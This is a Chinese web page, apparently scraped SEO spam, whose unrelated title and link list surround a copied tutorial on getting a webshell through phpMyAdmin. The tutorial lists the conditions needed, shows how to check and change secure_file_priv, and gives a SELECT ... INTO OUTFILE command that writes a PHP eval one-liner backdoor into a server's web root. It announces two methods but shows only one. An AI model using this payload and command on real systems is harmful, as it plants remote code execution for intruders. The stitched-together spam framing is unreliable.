当前位置: 首页 > news >正文

微信怎么做网站青岛网络seo公司

微信怎么做网站,青岛网络seo公司,计算机前景和就业,深圳专业网站建设0x00 前言 来到phpmyadmin页面后如何getshell呢?下面介绍两种方法 0x01 select into outfile直接写入 1、利用条件 对web目录需要有写权限能够使用单引号(root) 知道网站绝对路径(phpinfo/php探针/通过报错等) secure_file_priv没有具体值 2、查看secure_file…

0x00 前言

来到phpmyadmin页面后如何getshell呢?下面介绍两种方法

0x01 select into outfile直接写入

1、利用条件

  • 对web目录需要有写权限能够使用单引号(root)

  • 知道网站绝对路径(phpinfo/php探针/通过报错等)

  • secure_file_priv没有具体值

2、查看secure_file_priv值

show global variables like '%secure%';

关于secure_file_priv配置介绍:

secure_file_priv 是用来限制 load dumpfile、into outfile、load_file() 函数在哪个目录下拥有上传或者读取文件的权限

当 secure_file_priv 的值为 NULL ,表示限制 mysqld 不允许导入|导出,此时无法提权
当 secure_file_priv 的值为 /tmp/ ,表示限制 mysqld 的导入|导出只能发生在 /tmp/ 目录下,此时也无法提权
当 secure_file_priv 的值没有具体值时,表示不对 mysqld 的导入|导出做限制,此时可提权

我这里的secure_file_priv值为NULL,所以不能够导入或导出

secure_file_priv这个值是只读变量,只能通过配置文件修改。如果管理员没有配置,那么我们是无法进行写入shell的,这里我为了测试能否写入修改一下

在MySQL的配置文件my.ini中进行配置:

修改后secure_file_priv的值如图所示:

3、写入一句话

select '<?php @eval($POST[1]); ?>' INTO OUTFILE 'D:\\phpStudy\\PHPTutorial\\WWW\\a.php'

这里需要注意的一个点是路径需要用"\\"

查看下根目录

http://www.ds6.com.cn/news/78100.html

相关文章:

  • 网站备案成功后该怎么做旺道营销软件
  • 备案域名出售是否违法网站优化公司哪个好
  • 电子商务做网站骗钱怎么办简述网络营销的方法
  • 怎么做网站zwnetseo建站公司推荐
  • 奶茶店做网站好处网络营销是做什么的
  • 树莓派可以做网站空间吗杭州seo博客有哪些
  • 长沙企业网站建设收费全国疫情排名一览表
  • 涿鹿网站建设合肥百度seo代理
  • 河池公司做网站百度客户端在哪里打开
  • 潍坊建设网站多少钱百度一下官网首页百度
  • 口碑营销图片企业网站搜索优化网络推广
  • 哪里可以做虚拟货币网站中国站免费推广入口
  • qq是哪年开始有的seo是指什么意思
  • 做网站需要先申请域名如何制作网页链接
  • 网站怎么做六个页面域名申请哪家好
  • 网站图片如何做链接百度本地推广
  • 建设银行网盾进不去网站是怎么办广州抖音推广公司
  • 中和阗盛工程建设有限公司网站it培训机构排名及学费
  • 需要网站建设排名优化方法
  • 工商登记网站关键字挖掘爱站网
  • .xyz做网站怎么样国内b2b十大平台排名
  • 山东做网站公司制作自己的网站
  • 做网站培训厦门谷歌seo公司有哪些
  • 专门做自助游的网站南宁关键词优化服务
  • 国内知名软件开发公司谷歌网站推广优化
  • 幼儿园疫情主题网络图seo这个行业怎么样
  • 网站怎样做的刷外链网站
  • 网站设计大公司最新推广方法
  • 浙江新东阳建设集团有限公司网站火星时代教育培训机构怎么样
  • 建筑工程网站建设方案网络营销课程去哪里学